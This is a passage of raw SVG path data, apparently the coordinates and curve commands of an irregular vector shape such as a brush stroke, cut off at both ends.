-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.